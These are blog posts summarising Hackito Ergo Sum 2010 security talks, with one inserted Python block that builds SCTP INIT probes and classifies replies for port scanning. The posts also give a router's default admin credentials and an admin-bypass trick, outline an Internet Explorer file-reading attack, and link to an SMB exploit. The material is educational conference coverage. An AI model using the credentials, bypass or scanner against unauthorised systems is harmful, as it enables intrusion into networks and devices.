Then <b>Julien Vanegue</b> from Microsoft talked about "<b>Automated vulnerability analysis of zero-size heap allocations</b>" <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES10-jvanegue_zero-allocations.pdf">[Slides]</a>, and the day ended with "<b>Stack Smashing Protector in FreeBSD</b>", presented by <b>Paul Rascagneres</b> (in French). <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2Fssp-hes2010.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
<br />
These three days at Hackito Ergo Sum in Paris were very interesting; I'm very happy to have attended these talks and I think I'll be at HES2011. I want to thank the HES team for its work and say: "<i>See you in 2011 ;)</i>".<br />
<br />
If you spot any errors or want to make remarks, don't hesitate: the comments are there for that.<br />
<br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">Turbot : <a class="vt-p" href="http://code.google.com/p/turbot/">http://code.google.com/p/turbot/</a><br />
<br />
</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-30835329881609948972010-04-13T18:20:00.004+02:002010-12-16T16:28:17.451+01:00Hackito Ergo Sum, Day 2<div class="separator" style="clear: both; text-align: center;"><a class="vt-p" href="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><img border="0" height="140" src="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" width="200" /></a></div><div style="text-align: justify;">The first speaker of the second day was <b>Jorge Luis Alvarez Medina</b> from Core Security. His talk, "<b>Internet Explorer turns your personal computer into a public file server</b>", covered the same topic he had presented at Black Hat DC 2010 (February 2-3, 2010). It explained how it is possible to blindly read any file (browsing history, cookies...) on the victim's hard drive.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">He began by presenting IE's security mechanisms: security zones, zone elevation attacks (a web page in a given security zone loads a page from a less restrictive zone) and MIME type detection. The simplest scenario he described is the following:</div><div style="text-align: justify;">1- The attacker places a specially crafted HTML file in one of the victim's shared folders</div><div style="text-align: justify;">2- The attacker sends the victim a link to a malicious site</div><div style="text-align: justify;">3- The malicious web page redirects navigation to the uploaded file</div><div style="text-align: justify;">4- The HTML/script code runs in the context of 127.0.0.1</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">He continued with a demo of a BeEF module developed specifically for this vulnerability. To protect your computer against it, you can for example:</div><div style="text-align: justify;">- Set the security level of the Internet and Intranet zones to High</div><div style="text-align: justify;">- Use Internet Explorer in Protected Mode</div><div style="text-align: justify;">- Disable administrative shares</div><div style="text-align: justify;">- Change browser :)</div><div style="text-align: justify;"><a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES2010_Abusing_insecure_features_of_Internet_Explorer.pdf">[Slides]</a> <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FAbusing_insecure_features_of_Internet_Explorer.pdf">[Whitepaper]</a><br />
<br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><a class="vt-p" href="http://twitpic.com/1e914e" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;" title="Jonathan Brossard @ HES2010 on Twitpic"><img alt="Jonathan Brossard @ HES2010 on Twitpic" height="150" src="http://twitpic.com/show/thumb/1e914e.png" width="150" /></a>The last talk of the morning was given by <b>Jonathan Brossard</b> from P1 Security and was entitled "<b>Breaking Virtualization by switching to Virtual 8086 mode</b>". He began with a definition of virtualization and its different kinds (full virtualization, paravirtualization), then gave an overview of the classes of virtualization vulnerabilities:<br />
- privilege escalation inside a virtual machine<br />
- attacking another VM from one VM<br />
- denial of service against the host to disrupt the VMs<br />
- reaching the host from inside a VM<br />
During his research, Jonathan fuzzed VirtualBox, in which he found two bugs in the hypervisor, and found a bug affecting the guest machine in Virtual PC. He ended his presentation with a demonstration in which exploiting a bug he found in vserver crashed the host machine (his laptop in this case). <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FBreaking-virtualization-by-switching-to-Virtual-8086-mode_final.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
</div><div class="separator" style="clear: both; text-align: justify;"></div><div style="text-align: justify;"></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">During the lunch break I attended the lockpicking workshop, which was mostly hands-on. I learned how to build lockpicks and successfully picked one lock.</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">The afternoon began with a talk by <b>Matthieu Suiche</b> from MoonSols on <b>Mac OS X Physical Memory Analysis</b>. He covered physical memory analysis on Intel x86/x64 Macintosh machines (not PowerPC) running Mac OS X 10.5 (Leopard) or 10.6 (Snow Leopard). A lot of information can be recovered from memory: syscalls, processes, machine information (minor and major OS version, kernel version)... He was also able to recover the password of a user account (used to log on to the Mac) just by analysing memory. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES2010_MacOSX_devmem_analysis.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
<br />
</div><div style="text-align: justify;">The next talk, by <b>Sandro Gauci</b>, was named "<b>Attacking VoIP – attacks and the attackers</b>". He introduced SIP, SIP scanning and tools such as SIPVicious and VoIPPack for CANVAS. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2Fattacking-voip.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
<br />
</div><div style="text-align: justify;">Then <b>Laurent Gaffié</b> started his "<b>Fuzzing the SMB case</b>" talk with a presentation of this old protocol. His research approach was the following:</div><div style="text-align: justify;">- Reading the RFCs, books and Microsoft documentation</div><div style="text-align: justify;">- Setting up a lab representing a company network, from Windows 3.1 to Windows 7</div><div style="text-align: justify;">- Fuzzing the different SMB implementations</div><div style="text-align: justify;">During his demonstration, the bug he discovered let him trigger a blue screen on a remote Windows 7 victim within a few seconds. He is currently working with Microsoft's teams to fix this bug, which should be patched next Tuesday (MS10-020). He has also discovered many other bugs in Vista, XP, 7, Server 2008, Samba and NetWare 6.5 SP8. Because the packets are very small, all these bugs took less than two minutes to be found by Laurent's tools. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHackitoErgoSum-2010-Fuzzing-The-SMB-case-Presentation-v0-1e.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
<br />
</div><div style="text-align: justify;"><b>Lutz Böhne</b> gave the last talk of the second day, entitled "<b>Peeking into Pandora’s Bochs: instrumenting a full system emulator to analyse malicious software</b>". Pandora’s Bochs is an automated unpacker written in Python. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2F2010-04-09-Peeking-into-Pandoras-Bochs_RedTeam-Pentesting.pdf">[Slides]</a></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;">BeEF : <a class="vt-p" href="http://www.bindshell.net/tools/beef/">http://www.bindshell.net/tools/beef/</a></div><div style="text-align: justify;">SIPVicious : <a class="vt-p" href="http://code.google.com/p/sipvicious/">http://code.google.com/p/sipvicious/</a><br />
MS10-020 : <a class="vt-p" href="http://www.microsoft.com/technet/security/Bulletin/MS10-020.mspx">http://www.microsoft.com/technet/security/Bulletin/MS10-020.mspx</a><br />
SMB bug infos : <a class="vt-p" href="http://seclists.org/fulldisclosure/2010/Apr/201">http://seclists.org/fulldisclosure/2010/Apr/201</a><br />
SMB exploit : <a class="vt-p" href="http://www.exploit-db.com/exploits/12273">http://www.exploit-db.com/exploits/12273</a><br />
<br />
</div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-9565837529490545062010-04-11T21:16:00.004+02:002012-05-12T20:55:54.817+02:00Hackito Ergo Sum, Day 1<div class="separator" style="clear: both; text-align: center;">
<a class="vt-p" href="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"><img border="0" height="140" src="http://lekernel.net/blog/wp-content/uploads/2010/03/hackito-300x210.jpg" width="200" /></a></div>
<div style="text-align: justify;">
Hackito Ergo Sum is a three-day IT security and hacking conference held in Paris. This year was the first edition of HES; it ran from April 8th to 10th, 2010. Between 50 and 70 professionals and enthusiasts attended the event.</div>
<div style="text-align: justify;">
<br />
<br />
<br /></div>
<div style="text-align: justify;">
The first day began with <b>Jeremie Zimmerman</b> from "La quadrature du net", an organisation that defends citizens' rights and freedoms on the Internet. It was founded in 2008 by four or five people. They call themselves "law hackers", i.e. they look for inconsistencies in French and European laws. According to Jeremie, there is only one Internet, but in China, for example, users are not on the Internet but on the "Chinternet" because of the censorship applied by the authorities (see the Tiananmen case). His second example was mobile Internet: he said it is not the Internet either, because we cannot use P2P or newsgroups and some operators throttle traffic.</div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
The second talk of the morning was named "<b>Getting in the SS7 kingdom: hard technology and disturbingly easy hacks to get entry points in the walled garden</b>" and was presented by <b>Philippe Langlois</b> from P1 Security. SS7 (Signaling System 7) is a family of telephony protocols used in most phone networks in the world. Penetration tests of phone networks are currently very rare, as they were on IP networks in the 80's, but they should increase over the next 10 years. It is possible to scan and inject into these networks; for example, the SCTPscan tool (developed by Philippe and included in BackTrack 4) can be used to scan for SCTP equipment. SCTP (Stream Control Transmission Protocol) is a transport-layer protocol of the OSI model, like UDP or TCP. To scan an SCTP endpoint, an "INIT" packet is sent: if the port is closed, the target replies with an "ABORT"; if it is open, it replies with an "INIT-ACK" to a legitimate client but may not reply at all to the attacker. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FAttacking-SS7-2010-Philipe-Langlois-P1security-HES-v10.pdf">[Slides]</a></div>
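As an added example (mine, not SCTPscan's code), the Python below builds the SCTP INIT probe such a scan sends and classifies the reply by chunk type the way the paragraph describes: INIT-ACK means open, ABORT means closed, no reply means filtered (or a host that only answers known peers). It includes the CRC-32C checksum that RFC 4960 mandates and a helper that fabricates minimal replies so the classifier can be exercised offline. Actually sending the probe needs a raw socket and root, which the example deliberately leaves out; the sample replies are constructed, not captured, and the port numbers are assumptions (2905 is the M3UA default).

```python
import struct
from typing import Optional

# CRC-32C (Castagnoli, reflected polynomial 0x82F63B78), the checksum SCTP requires.
_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0x82F63B78 if _c & 1 else _c >> 1
    _TABLE.append(_c)


def crc32c(data: bytes) -> int:
    crc = 0xFFFFFFFF
    for b in data:
        crc = _TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


CHUNK_INIT, CHUNK_INIT_ACK, CHUNK_ABORT = 1, 2, 6
HEADER_LEN = 12  # src port, dst port, verification tag, checksum


def _finalize(header_no_cksum: bytes, chunks: bytes) -> bytes:
    """Fill in the checksum: CRC-32C over the packet with the field zeroed,
    stored in little-endian byte order (RFC 4960, Appendix B)."""
    pkt = header_no_cksum[:8] + b"\x00\x00\x00\x00" + chunks
    return pkt[:8] + struct.pack("<I", crc32c(pkt)) + chunks


def build_init(src_port: int, dst_port: int, initiate_tag: int = 0x1234ABCD) -> bytes:
    """INIT probe: common header with verification tag 0 (mandatory for INIT)
    followed by a 20-byte INIT chunk. The initiate tag must be non-zero."""
    if initiate_tag == 0:
        raise ValueError("initiate tag must be non-zero")
    init_chunk = struct.pack("!BBHIIHHI",
                             CHUNK_INIT, 0, 20,   # type, flags, length
                             initiate_tag,        # tag the peer must echo in its reply
                             65535,               # advertised receiver window
                             10, 2048,            # outbound / max inbound streams
                             initiate_tag)        # initial TSN
    return _finalize(struct.pack("!HHI", src_port, dst_port, 0), init_chunk)


def build_sample_reply(src_port: int, dst_port: int, vtag: int, chunk_type: int) -> bytes:
    """Constructed minimal reply for exercising the classifier (not a real stack's
    output): an ABORT is a 4-byte chunk; the INIT-ACK here is only the fixed part."""
    if chunk_type == CHUNK_ABORT:
        chunk = struct.pack("!BBH", CHUNK_ABORT, 0, 4)
    else:
        chunk = struct.pack("!BBHIIHHI", chunk_type, 0, 20, 0xCAFEF00D, 65535, 10, 10, 1)
    return _finalize(struct.pack("!HHI", src_port, dst_port, vtag), chunk)


def checksum_ok(pkt: bytes) -> bool:
    stored = struct.unpack("<I", pkt[8:12])[0]
    return stored == crc32c(pkt[:8] + b"\x00\x00\x00\x00" + pkt[12:])


def classify_response(reply: Optional[bytes], initiate_tag: int = 0x1234ABCD) -> str:
    """Map the reply to an INIT probe onto a port state."""
    if reply is None:
        return "filtered-or-silent"
    if len(reply) < HEADER_LEN + 4 or not checksum_ok(reply):
        return "malformed"
    vtag = struct.unpack("!I", reply[4:8])[0]
    if vtag != initiate_tag:
        return "malformed"  # a reply to our INIT must carry our initiate tag
    chunk_type = reply[HEADER_LEN]
    if chunk_type == CHUNK_INIT_ACK:
        return "open"
    if chunk_type == CHUNK_ABORT:
        return "closed"
    return f"unexpected-chunk-{chunk_type}"


if __name__ == "__main__":
    probe = build_init(5000, 2905)
    print(len(probe), "byte INIT, checksum ok:", checksum_ok(probe))
    for name, reply in (("INIT-ACK", build_sample_reply(2905, 5000, 0x1234ABCD, CHUNK_INIT_ACK)),
                        ("ABORT", build_sample_reply(2905, 5000, 0x1234ABCD, CHUNK_ABORT)),
                        ("none", None)):
        print(f"{name:9s} -> {classify_response(reply)}")
```

To turn this into a scanner, send the probe over a raw socket with IP protocol 132 and feed whatever comes back into classify_response; the "filtered-or-silent" case is exactly the equipment the talk mentions, which only answers peers it has been configured for.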
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
The afternoon began with a talk about the <b>FPGA security challenge</b>. <b>Sebastien Bourdeauducq</b>, aka lekernel, briefly explained what an FPGA is and then talked about the challenge, which was available during the 3 days of HES 2010. If you need more information on FPGAs, I recommend Wikipedia. The challenge was composed of 6 levels of increasing difficulty. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FFPGA-Challenge-Sebastien-Bourdeauducq.pdf">[Slides]</a></div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
The talk following Sebastien's was presented by <b>Benjamin Henrion</b>. He talked about modifying/hacking one of the most widespread Linux devices in Belgium: the Belgacom Box 2. This box is made by Sagem and has hardware similar to Orange's Livebox. It runs OpenRG Linux and is equipped with a VDSL interface, VoIP and an Atheros card. By default, telnet is open and a default login/password combination is used (admin/BGCVDSL2). He also found a way to get full admin access on the web interface just by putting the login and password in the URL as GET parameters. It is possible to load custom code onto it via USB key, telnet or TFTP. For example, Benjamin successfully turned his box into a torrent box running Transmission with CLI and web access, and installed tools like tcpdump and airodump ... <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2Fbbox2-hes2010.pdf">[Slides]</a></div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
The third talk of the afternoon was about the <b>use of artificial intelligence techniques to improve pentesting automation</b>. The speaker, <b>Carlos Sarraute</b>, came directly from Argentina and works at Core Security, the vendor of the penetration testing product Core Impact. His talk began with a quick overview of pentest frameworks, the evolution of pentests and a description of attack planning. He talked about PDDL (Planning Domain Description Language) and how AI can be used for pentests. For example, one can define different object types (host, network, port ...) and use predicates such as TCP connectivity ... <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES2010_Sarraute_Using_AI_Techniques_to_improve_Pentesting_Automation.pdf">[Slides]</a></div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
The last talk of the day was entitled "<b>Evolution of Microsoft security mitigations</b>" and was presented by <b>Tim Burrell</b> from Microsoft. Since I didn't attend it, I can't describe this talk. <a class="vt-p" href="https://docs.google.com/viewer?url=http%3A%2F%2Fhackitoergosum.org%2Fwp-content%2Fuploads%2F2010%2F04%2FHES2010_Evolution_Of_Microsofts_Mitigations.pdf">[Slides]</a></div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
All comments about what I've written are welcome.</div>
<div style="text-align: justify;">
<br />
<br /></div>
<div style="text-align: justify;">
Conference website: <a class="vt-p" href="http://hackitoergosum.org/">http://hackitoergosum.org/</a></div>
<div style="text-align: justify;">
HES Twitter: <a class="vt-p" href="http://twitter.com/HackitoErgoSum">http://twitter.com/HackitoErgoSum</a></div>
<div style="text-align: justify;">
Videos: <a class="vt-p" href="http://www.livestream.com/hackitoergosum">http://www.livestream.com/hackitoergosum</a></div>
<div style="text-align: justify;">
SCTPscan: <a class="vt-p" href="http://www.p1sec.com/corp/research/tools/sctpscan/">http://www.p1sec.com/corp/research/tools/sctpscan/</a></div>
<div style="text-align: justify;">
FPGA: <a class="vt-p" href="http://en.wikipedia.org/wiki/Fpga">http://en.wikipedia.org/wiki/Fpga</a></div>
<div style="text-align: justify;">
FPGA security challenge: <a class="vt-p" href="http://lekernel.net/blog/?p=975">http://lekernel.net/blog/?p=975</a><br />
<br /></div><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>Steeve BARBEAUhttp://www.blogger.com/profile/13290697188569225316noreply@blogger.com0tag:blogger.com,1999:blog-6555208034441643895.post-88389071784908892212010-04-03T20:16:00.009+02:002019-08-07T23:10:58.927+02:00My first post ...<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;">Welcome to my blog :)</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;">Here I will post some articles on computer security and computer science in general. Some posts will be in English, others in French, and maybe some in both languages.</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;">Here are some links about me:</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;"><a href="https://www.linkedin.com/in/steevebarbeau/">https://www.linkedin.com/in/steevebarbeau/</a></span></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<a class="vt-p" href="http://twitter.com/steevebarbeau"><span class="Apple-style-span" style="font-family: inherit;">http://twitter.com/steevebarbeau</span></a></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;">In a few weeks I'll attend Hackito Ergo Sum, an IT security conference in Paris, so the next posts will be about this event, which promises to be awesome.</span></div>
<div style="line-height: 1.6em; margin-bottom: 0.7em; margin-left: 0px; margin-right: 0px; margin-top: 0.7em; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;">
<div style="text-align: justify;">
<span class="Apple-style-span" style="font-family: inherit;">Thank you for reading my blog.</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div>
</div>